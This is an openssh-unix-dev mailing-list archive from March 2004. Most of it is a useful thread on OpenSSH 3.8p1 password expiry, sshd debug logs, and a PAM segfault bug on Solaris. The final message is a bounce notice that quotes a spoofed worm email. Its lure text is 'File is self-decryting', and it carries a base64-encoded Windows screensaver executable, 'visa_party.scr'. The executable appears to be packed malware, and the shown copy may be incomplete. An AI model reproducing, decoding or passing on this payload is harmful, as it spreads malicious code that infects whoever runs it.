are the correct results: after running passwd -f, I get prompt for password and after typing correct password, I get "Connection closed by ". Using passwd -df simply results in three prompts for password and permission denied after that (This must be the result of PermitEmptyPasswords=no). -Dmitry. > -----Original Message----- > From: openssh-unix-dev-bounces+dberezin=acs.rutgers.edu at mindrot.org > [mailto:openssh-unix-dev-bounces+dberezin=acs.rutgers.edu at mindrot.org] On > Behalf Of Dmitry Berezin > Sent: Thursday, March 18, 2004 6:51 PM > To: 'Darren Tucker'; 'Kevin Mack' > Cc: openssh-unix-dev at mindrot.org > Subject: RE: 3.8p1 password expiry, Solaris 8 > > I have just tried expiring a password on Solaris 9 box running 3.8p1 and > it > works with keyboard-interactive authentication, but does not work with > password authentication. If I just expire password with passwd -f, then I > simply get permission denied. If I also clear it, passwd -df, then I first > get a prompt for the password and then permission denied. > > -Dmitry. > > > -----Original Message----- > > From: openssh-unix-dev-bounces+dberezin=acs.rutgers.edu at mindrot.org > > [mailto:openssh-unix-dev-bounces+dberezin=acs.rutgers.edu at mindrot.org] > On > > Behalf Of Darren Tucker > > Sent: Thursday, March 18, 2004 6:16 PM > > To: Kevin Mack > > Cc: openssh-unix-dev at mindrot.org > > Subject: Re: 3.8p1 password expiry, Solaris 8 > > > > Kevin Mack wrote: > > > I can't seem to get the /etc/shadow password expiry working on > > > 3.8p1 on Solaris 8. It works fine with 3.7.1p2 and pwexp26. > > > Logins aren't affected after a 'passwd -df' or 'passwd -f'. > > [...] > > > 'ssh -V': > > > OpenSSH_3.8.p1-pwexp26, SSH protocols 1.5/2.0, OpenSSL 0.9.7c 30 Sep > > 2003 > > > > I never released a pwexp patch for 3.8p1, where did you get that? > > > > > debug2: we sent a publickey packet, wait for reply > > > debug1: Server accepts key: pkalg ssh-dss blen 434 > > > > The password expiry code in 3.8p1 is only checked for password or > > keyboard-interactive authentications. It does not get checked for > > public-key (or hostbased) logins. > > > > I posted a more details explanation of the differences a while back: > > http://marc.theaimsgroup.com/?l=openssh-unix-dev&m=107650523726292 > > > > -- > > Darren Tucker (dtucker at zip.com.au) > > GPG key 8FF4FA69 / D9A3 86E9 7EEE AF4B B2D4 37C9 C982 80C7 8FF4 FA69 > > Good judgement comes with experience. Unfortunately, the experience > > usually comes from bad judgement. > > > > _______________________________________________ > > openssh-unix-dev mailing list > > openssh-unix-dev at mindrot.org > > http://www.mindrot.org/mailman/listinfo/openssh-unix-dev > > _______________________________________________ > openssh-unix-dev mailing list > openssh-unix-dev at mindrot.org > http://www.mindrot.org/mailman/listinfo/openssh-unix-dev From dtucker at zip.com.au Fri Mar 19 11:03:54 2004 From: dtucker at zip.com.au (Darren Tucker) Date: Fri, 19 Mar 2004 11:03:54 +1100 Subject: 3.8p1 password expiry, Solaris 8 In-Reply-To: <009401c40d43$cc328790$5bd90680@acsdev78> References: <009401c40d43$cc328790$5bd90680@acsdev78> Message-ID: <405A38EA.4070905@zip.com.au> Dmitry Berezin wrote: > I have just tried expiring a password on Solaris 9 box running 3.8p1 and it > works with keyboard-interactive authentication, but does not work with > password authentication. If I just expire password with passwd -f, then I > simply get permission denied. If I also clear it, passwd -df, then I first > get a prompt for the password and then permission denied. In the password auth case, is that with UsePAM=no? Can you send the server-side debugging for the case where it doesn't work? -- Darren Tucker (dtucker at zip.com.au) GPG key 8FF4FA69 / D9A3 86E9 7EEE AF4B B2D4 37C9 C982 80C7 8FF4 FA69 Good judgement comes with experience. Unfortunately, the experience usually comes from bad judgement. From dtucker at zip.com.au Fri Mar 19 11:11:23 2004 From: dtucker at zip.com.au (Darren Tucker) Date: Fri, 19 Mar 2004 11:11:23 +1100 Subject: 3.8p1 password expiry, Solaris 8 In-Reply-To: <009501c40d45$7ababf20$5bd90680@acsdev78> References: <009501c40d45$7ababf20$5bd90680@acsdev78> Message-ID: <405A3AAB.4070001@zip.com.au> Dmitry Berezin wrote: > Oops, bad test. (I must have forgotten to restart sshd after making changes > to sshd_config. Here are the correct results: after running passwd -f, I get > prompt for password and after typing correct password, I get "Connection > closed by ". That, unfortunately, is a bug. For details, and a patch, see: http://bugzilla.mindrot.org/show_bug.cgi?id=808 > Using passwd -df simply results in three prompts for > password and permission denied after that (This must be the result of > PermitEmptyPasswords=no). Yes, that is most likely because of PermitEmptypasswords. -- Darren Tucker (dtucker at zip.com.au) GPG key 8FF4FA69 / D9A3 86E9 7EEE AF4B B2D4 37C9 C982 80C7 8FF4 FA69 Good judgement comes with experience. Unfortunately, the experience usually comes from bad judgement. From dtucker at zip.com.au Fri Mar 19 11:12:58 2004 From: dtucker at zip.com.au (Darren Tucker) Date: Fri, 19 Mar 2004 11:12:58 +1100 Subject: 3.8p1 password expiry, Solaris 8 In-Reply-To: <20040318234615.GA22990@gibraltar> References: <20040318224930.GA22788@gibraltar> <405A2D97.4030809@zip.com.au> <20040318234615.GA22990@gibraltar> Message-ID: <405A3B0A.30101@zip.com.au> Kevin Mack wrote: > On Fri, Mar 19, 2004 at 10:15:35AM +1100, Darren Tucker wrote: >>I posted a more details explanation of the differences a while back: >>http://marc.theaimsgroup.com/?l=openssh-unix-dev&m=107650523726292 > > Thanks Darren, we'll use 3.7.1p2 for now. Do you need password expiry for non-password authentications? -- Darren Tucker (dtucker at zip.com.au) GPG key 8FF4FA69 / D9A3 86E9 7EEE AF4B B2D4 37C9 C982 80C7 8FF4 FA69 Good judgement comes with experience. Unfortunately, the experience usually comes from bad judgement. From dberezin at acs.rutgers.edu Fri Mar 19 11:32:02 2004 From: dberezin at acs.rutgers.edu (Dmitry Berezin) Date: Thu, 18 Mar 2004 19:32:02 -0500 Subject: 3.8p1 password expiry, Solaris 8 In-Reply-To: <405A38EA.4070905@zip.com.au> Message-ID: <009601c40d49$9911f0c0$5bd90680@acsdev78> UsePAM=yes. Here is the debug ******************************** bash-2.05# /usr/local/sbin/sshd -ddd debug2: read_server_config: filename /usr/local/etc/sshd_config debug1: sshd version OpenSSH_3.8p1 debug1: private host key: #0 type 0 RSA1 debug3: Not a RSA1 key file /usr/local/etc/ssh_host_rsa_key. debug1: read PEM private key done: type RSA debug1: private host key: #1 type 1 RSA debug3: Not a RSA1 key file /usr/local/etc/ssh_host_dsa_key. debug1: read PEM private key done: type DSA debug1: private host key: #2 type 2 DSA debug1: Bind to port 22 on ::. Server listening on :: port 22. debug1: Bind to port 22 on 0.0.0.0. Server listening on 0.0.0.0 port 22. Generating 768 bit RSA key. RSA key generation complete. debug1: Server will not fork when running in debugging mode. Connection from <...> port 4116 debug1: Client protocol version 1.99; client software version 3.2.9 SSH Secure Shell for Windows debug1: no match: 3.2.9 SSH Secure Shell for Windows debug1: Enabling compatibility mode for protocol 2.0 debug1: Local version string SSH-1.99-OpenSSH_3.8p1 debug3: privsep user:group debug1: permanently_set_uid: debug1: list_hostkey_types: ssh-rsa,ssh-dss debug1: SSH2_MSG_KEXINIT sent debug1: SSH2_MSG_KEXINIT received debug2: kex_parse_kexinit: diffie-hellman-group-exchange-sha1,diffie-hellman-group1-sha1 debug2: kex_parse_kexinit: ssh-rsa,ssh-dss debug2: kex_parse_kexinit: aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour,aes192-cbc,aes256-cbc,r ijndael-cbc at lysator.liu.se,aes128-ctr,aes192-ctr,aes256-ctr debug2: kex_parse_kexinit: aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour,aes192-cbc,aes256-cbc,r ijndael-cbc at lysator.liu.se,aes128-ctr,aes192-ctr,aes256-ctr debug2: kex_parse_kexinit: hmac-md5,hmac-sha1,hmac-ripemd160,hmac-ripemd160 at openssh.com,hmac-sha1-96,hm ac-md5-96 debug2: kex_parse_kexinit: hmac-md5,hmac-sha1,hmac-ripemd160,hmac-ripemd160 at openssh.com,hmac-sha1-96,hm ac-md5-96 debug2: kex_parse_kexinit: none,zlib debug2: kex_parse_kexinit: none,zlib debug2: kex_parse_kexinit: debug2: kex_parse_kexinit: debug2: kex_parse_kexinit: first_kex_follows 0 debug2: kex_parse_kexinit: reserved 0 debug2: kex_parse_kexinit: diffie-hellman-group1-sha1 debug2: kex_parse_kexinit: ssh-dss,ssh-rsa,x509v3-sign-dss,x509v3-sign-rsa debug2: kex_parse_kexinit: aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,twofish-cbc,arcfour debug2: kex_parse_kexinit: aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,twofish-cbc,arcfour debug2: kex_parse_kexinit: hmac-md5,hmac-sha1 debug2: kex_parse_kexinit: hmac-md5,hmac-sha1 debug2: kex_parse_kexinit: none debug2: kex_parse_kexinit: none debug2: kex_parse_kexinit: debug2: kex_parse_kexinit: debug2: kex_parse_kexinit: first_kex_follows 0 debug2: kex_parse_kexinit: reserved 0 debug2: mac_init: found hmac-md5 debug1: kex: client->server aes128-cbc hmac-md5 none debug2: mac_init: found hmac-md5 debug1: kex: server->client aes128-cbc hmac-md5 none debug2: Network child is on pid 5318 debug3: preauth child monitor started debug3: mm_request_receive entering debug2: dh_gen_key: priv key bits set: 131/256 debug2: bits set: 504/1024 debug1: expecting SSH2_MSG_KEXDH_INIT debug2: bits set: 527/1024 debug3: mm_key_sign entering debug3: mm_request_send entering: type 4 debug3: monitor_read: checking request 4 debug3: mm_answer_sign debug3: mm_answer_sign: signature 758b8(55) debug3: mm_request_send entering: type 5 debug2: monitor_read: 4 used once, disabling now debug3: mm_request_receive entering debug3: mm_key_sign: waiting for MONITOR_ANS_SIGN debug3: mm_request_receive_expect entering: type 5 debug3: mm_request_receive entering debug2: kex_derive_keys debug2: set_newkeys: mode 1 debug1: SSH2_MSG_NEWKEYS sent debug1: expecting SSH2_MSG_NEWKEYS debug2: set_newkeys: mode 0 debug1: SSH2_MSG_NEWKEYS received debug1: KEX done debug1: userauth-request for user dberezin service ssh-connection method none debug1: attempt 0 failures 0 debug3: mm_getpwnamallow entering debug3: mm_request_send entering: type 6 debug3: monitor_read: checking request 6 debug3: mm_answer_pwnamallow debug3: mm_answer_pwnamallow: sending MONITOR_ANS_PWNAM: 1 debug3: mm_request_send entering: type 7 debug2: monitor_read: 6 used once, disabling now debug3: mm_request_receive entering debug3: mm_getpwnamallow: waiting for MONITOR_ANS_PWNAM debug3: mm_request_receive_expect entering: type 7 debug3: mm_request_receive entering debug2: input_userauth_request: setting up authctxt for dberezin debug3: mm_start_pam entering debug3: mm_request_send entering: type 45 debug3: monitor_read: checking request 45 debug1: PAM: initializing for "dberezin" debug3: mm_inform_authserv entering debug3: mm_request_send entering: type 3 debug2: input_userauth_request: try method none debug3: mm_auth_password entering debug3: mm_request_send entering: type 10 debug3: mm_auth_password: waiting for MONITOR_ANS_AUTHPASSWORD debug3: mm_request_receive_expect entering: type 11 debug3: mm_request_receive entering debug3: Trying to reverse map address <...>. debug1: PAM: setting PAM_RHOST to "<...>" debug1: PAM: setting PAM_TTY to "ssh" debug2: monitor_read: 45 used once, disabling now debug3: mm_request_receive entering debug3: monitor_read: checking request 3 debug3: mm_answer_authserv: service=ssh-connection, style= debug2: monitor_read: 3 used once, disabling now debug3: mm_request_receive entering debug3: monitor_read: checking request 10 debug3: mm_answer_authpassword: sending result 0 debug3: mm_request_send entering: type 11 Failed none for dberezin from <...> port 4116 ssh2 debug3: mm_request_receive entering debug3: mm_auth_password: user not authenticated Failed none for dberezin from <...> port 4116 ssh2 debug1: userauth-request for user dberezin service ssh-connection method password debug1: attempt 1 failures 1 debug2: input_userauth_request: try method password debug3: mm_auth_password entering debug3: mm_request_send entering: type 10 debug3: mm_auth_password: waiting for MONITOR_ANS_AUTHPASSWORD debug3: mm_request_receive_expect entering: type 11 debug3: mm_request_receive entering debug3: monitor_read: checking request 10 debug3: auth_shadow_pwexpired: today 12496 sp_lstchg 0 sp_max -1 User dberezin password has expired (root forced) debug3: mm_answer_authpassword: sending result 1 debug3: mm_request_send entering: type 11 debug3: mm_request_receive_expect entering: type 46 debug3: mm_request_receive entering debug3: mm_auth_password: user authenticated debug3: mm_do_pam_account entering debug3: mm_request_send entering: type 46 debug3: mm_request_receive_expect entering: type 47 debug3: mm_request_receive entering debug3: PAM: do_pam_account pam_acct_mgmt = 10 debug3: pam_password_change_required 1 debug1: do_cleanup debug1: PAM: cleanup debug3: PAM: sshpam_thread_cleanup entering Segmentation Fault (core dumped) bash-2.05# -Dmitry. > -----Original Message----- > From: Darren Tucker [mailto:dtucker at zip.com.au] > Sent: Thursday, March 18, 2004 7:04 PM > To: Dmitry Berezin > Cc: openssh-unix-dev at mindrot.org > Subject: Re: 3.8p1 password expiry, Solaris 8 > > Dmitry Berezin wrote: > > I have just tried expiring a password on Solaris 9 box running 3.8p1 and > it > > works with keyboard-interactive authentication, but does not work with > > password authentication. If I just expire password with passwd -f, then > I > > simply get permission denied. If I also clear it, passwd -df, then I > first > > get a prompt for the password and then permission denied. > > In the password auth case, is that with UsePAM=no? Can you send the > server-side debugging for the case where it doesn't work? > > -- > Darren Tucker (dtucker at zip.com.au) > GPG key 8FF4FA69 / D9A3 86E9 7EEE AF4B B2D4 37C9 C982 80C7 8FF4 FA69 > Good judgement comes with experience. Unfortunately, the experience > usually comes from bad judgement.. From dtucker at zip.com.au Fri Mar 19 11:38:57 2004 From: dtucker at zip.com.au (Darren Tucker) Date: Fri, 19 Mar 2004 11:38:57 +1100 Subject: 3.8p1 password expiry, Solaris 8 In-Reply-To: <009601c40d49$9911f0c0$5bd90680@acsdev78> References: <009601c40d49$9911f0c0$5bd90680@acsdev78> Message-ID: <405A4121.2050008@zip.com.au> Dmitry Berezin wrote: > UsePAM=yes. Here is the debug [snip] > debug3: pam_password_change_required 1 > debug1: do_cleanup > debug1: PAM: cleanup > debug3: PAM: sshpam_thread_cleanup entering > Segmentation Fault (core dumped) Yep, that's bug #808. Expiry will work OK if you set UsePAM=no. -- Darren Tucker (dtucker at zip.com.au) GPG key 8FF4FA69 / D9A3 86E9 7EEE AF4B B2D4 37C9 C982 80C7 8FF4 FA69 Good judgement comes with experience. Unfortunately, the experience usually comes from bad judgement. From kmack at sgi.sk.ca Fri Mar 19 11:38:58 2004 From: kmack at sgi.sk.ca (Kevin Mack) Date: Thu, 18 Mar 2004 18:38:58 -0600 Subject: 3.8p1 password expiry, Solaris 8 In-Reply-To: <405A3B0A.30101@zip.com.au> References: <20040318224930.GA22788@gibraltar> <405A2D97.4030809@zip.com.au> <20040318234615.GA22990@gibraltar> <405A3B0A.30101@zip.com.au> Message-ID: <20040319003858.GA23358@gibraltar> On Fri, Mar 19, 2004 at 11:12:58AM +1100, Darren Tucker wrote: > Kevin Mack wrote: > >On Fri, Mar 19, 2004 at 10:15:35AM +1100, Darren Tucker wrote: > >>I posted a more details explanation of the differences a while back: > >>http://marc.theaimsgroup.com/?l=openssh-unix-dev&m=107650523726292 > > > >Thanks Darren, we'll use 3.7.1p2 for now. > > Do you need password expiry for non-password authentications? Umm, strictly speaking, no. We use both public-key and password authentications and find it more convenient to have password expiry on all accounts, and easier to lock them with 'passwd -l'. From dtucker at zip.com.au Fri Mar 19 11:47:15 2004 From: dtucker at zip.com.au (Darren Tucker) Date: Fri, 19 Mar 2004 11:47:15 +1100 Subject: 3.8p1 password expiry, Solaris 8 In-Reply-To: <20040319003858.GA23358@gibraltar> References: <20040318224930.GA22788@gibraltar> <405A2D97.4030809@zip.com.au> <20040318234615.GA22990@gibraltar> <405A3B0A.30101@zip.com.au> <20040319003858.GA23358@gibraltar> Message-ID: <405A4313.2040603@zip.com.au> Kevin Mack wrote: > On Fri, Mar 19, 2004 at 11:12:58AM +1100, Darren Tucker wrote: >>Do you need password expiry for non-password authentications? > > Umm, strictly speaking, no. We use both public-key and password > authentications and find it more convenient to have password > expiry on all accounts, and easier to lock them with 'passwd -l'. Since about 3.7p1, sshd will honour "passwd -l" locking of accounts for any auth method as long as UsePAM=no. (When UsePAM=yes, those checks are delegated to PAM, and I believe its behaviour depends on which Solaris patches you have installed). -- Darren Tucker (dtucker at zip.com.au) GPG key 8FF4FA69 / D9A3 86E9 7EEE AF4B B2D4 37C9 C982 80C7 8FF4 FA69 Good judgement comes with experience. Unfortunately, the experience usually comes from bad judgement. From dberezin at acs.rutgers.edu Fri Mar 19 12:02:07 2004 From: dberezin at acs.rutgers.edu (Dmitry Berezin) Date: Thu, 18 Mar 2004 20:02:07 -0500 Subject: 3.8p1 password expiry, Solaris 8 In-Reply-To: <405A4121.2050008@zip.com.au> Message-ID: <009701c40d4d$cd474760$5bd90680@acsdev78> > Yep, that's bug #808. Expiry will work OK if you set UsePAM=no. UsePAM=no works fine. I have some strange problem while running sshd in debug mode, though. If I login to the server with Gnome 2.0 desktop as a regular user, su to root, and then run sshd -ddd, then when some other user with expired password tries to login and sshd tries to change password for that user, I get an error message: WARNING: Your password has expired. You must change your password now and login again! passwd: Changing password for Permission denied If I just ssh into the box and start sshd -ddd on some other port, the problem does not occur. I will do some more tests tomorrow and post more precise info about this. (It's late and I might be doing something wrong) -Dmitry. > > -- > Darren Tucker (dtucker at zip.com.au) > GPG key 8FF4FA69 / D9A3 86E9 7EEE AF4B B2D4 37C9 C982 80C7 8FF4 FA69 > Good judgement comes with experience. Unfortunately, the experience > usually comes from bad judgement.. From kumaresh_ind at gmx.net Fri Mar 19 21:04:36 2004 From: kumaresh_ind at gmx.net (Kumaresh) Date: Fri, 19 Mar 2004 15:34:36 +0530 Subject: rsa_public_encrypt : exponent too small or not odd error with SSH-1 with OpenSSL0.9.7d Message-ID: <004101c40d99$a1e6a060$230110ac@kurco> Hello, I have compiled OpenSSL-0.9.7d - the lastest version and when OpenSSH-3.7.1p2 is compiled with this ssl library [0.9.7d], I am getting the following error when SSH-1 connection is done. I am using HP-UX IPF box and I am doing 32 bit compilation only. Even I have changed the optimization level for OpenSSL and no use. Any clue why this problem is occuring? Advance thanks, Kumaresh --- Outgoing mail is certified Virus Free. Checked by AVG anti-virus system (http://www.grisoft.com). Version: 6.0.576 / Virus Database: 365 - Release Date: 1/30/2004 From MAILER-DAEMON at anet-mail20.anet.ne.jp Fri Mar 19 23:01:25 2004 From: MAILER-DAEMON at anet-mail20.anet.ne.jp (MAILER-DAEMON at anet-mail20.anet.ne.jp) Date: 19 Mar 2004 21:01:25 +0900 Subject: failure notice Message-ID: <20040319120120.C5AA327C187@shitei.mindrot.org> Hi. This is the qmail-send program at anet-mail20.anet.ne.jp. I'm afraid I wasn't able to deliver your message to the following addresses. This is a permanent error; I've given up. Sorry it didn't work out. : sqlforward: fatal: This address not registered --- Below this line is a copy of the message. Return-Path: Received: (qmail 5006 invoked by uid 0); 19 Mar 2004 21:01:20 +0900 Received: from unknown (HELO anet.ne.jp) (200.233.66.132) by mail20.anet.ne.jp with SMTP; 19 Mar 2004 21:01:20 +0900 From: openssh-unix-dev at mindrot.org To: sancyo at anet.ne.jp Subject: File is self-decryting. Date: Fri, 19 Mar 2004 09:01:26 -0300 MIME-Version: 1.0 Content-Type: multipart/mixed; boundary="----=_NextPart_000_0009_0000133F.000042A1" X-Priority: 3 X-MSMail-Priority: Normal This is a multi-part message in MIME format. ------=_NextPart_000_0009_0000133F.000042A1 Content-Type: text/plain; charset="Windows-1252" Content-Transfer-Encoding: 7bit that's not the truth? ------=_NextPart_000_0009_0000133F.000042A1 Content-Type: application/octet-stream; name="visa_party.scr" Content-Transfer-Encoding: base64 Content-Disposition: attachment; filename="visa_party.scr" TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAuAAAAGsiX1YvQzEFL0MxBS9DMQWsXz8FI0MxBcdcOwU0QzEFL0MwBXBDMQWsS2wF IkMxBcdcOgUqQzEFl0U3BS5DMQVSaWNoL0MxBQAAAAAAAAAAQ29tcHJlc3NlZCBieSBQZXRp dGUgKGMpMTk5OSBJYW4gTHVjay4AAFBFAABMAQMA7Kc7QAAAAAAAAAAA4AAPAQsBBgAAUAAA ABwBAAAAAABCoAEAABAAAABgAAAAAEAAABAAAAACAAAEAAAAAAAAAAQAAAAAAAAAALABAAAE AAAAAAAAAgAAAAAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAA/KEBAK8BAAAAkAEA CAUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAgAEAABAAAABWAAAACAAAAAAAAAAAAAAAAAAAYAAA4C5wZXRpdGUAABAAAACQ AQAIBQAAAF4AAAAAAAAAAAAAAAAAAEAAAEAAAAAAAAAAAKsDAAAAoAEAAAQAAAAEAAAAAAAA AAAAAAAAAABgAADiAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 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 